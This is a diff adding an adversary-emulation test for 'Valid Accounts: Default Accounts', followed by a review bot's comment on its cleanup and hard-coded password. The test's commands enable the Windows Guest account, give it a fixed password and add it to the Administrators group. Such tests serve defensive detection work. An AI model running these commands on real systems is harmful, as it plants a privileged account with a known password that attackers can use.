diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
new file mode 100644
index 00000000..c8813e44
--- /dev/null
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1078.001
+display_name: 'Valid Accounts: Default Accounts'
+atomic_tests:
+- name: Enable Guest account
+ description: After execution the Default Guest account will be enabled (Active) and added to Administrators Group
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ net user guest /active:yes
+ net user guest Paswword123!
+ net localgroup administrators guest /add
+ cleanup_command: |-
+ net user guest /active:no
+ net localgroup administrators guest /delete
+ name: command_prompt
+ elevation_required: true
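Review bot: The `cleanup_command` disables Guest and removes it from Administrators but never undoes `net user guest Paswword123!`, so after cleanup the account still carries a password that is hard-coded in the test file (and spelled `Paswword`, which looks unintended). Moving the value into `input_arguments` and referencing it as `#{guest_password}` lets whoever runs the test pick a unique value per host, and the description should say that the password change is not reverted. Cleanup also runs `/active:no` unconditionally, which changes state on a host where Guest was already enabled before the test; that deserves a sentence in the description as well.

```yaml
  # … unchanged: name, description, supported_platforms …
  input_arguments:
    guest_password:
      description: Password set on the Guest account while the test runs (not reverted by cleanup)
      type: string
      default: 'Paswword123!'
  executor:
    command: |
      net user guest /active:yes
      net user guest #{guest_password}
      net localgroup administrators guest /add
    # … unchanged: cleanup_command, name, elevation_required …
```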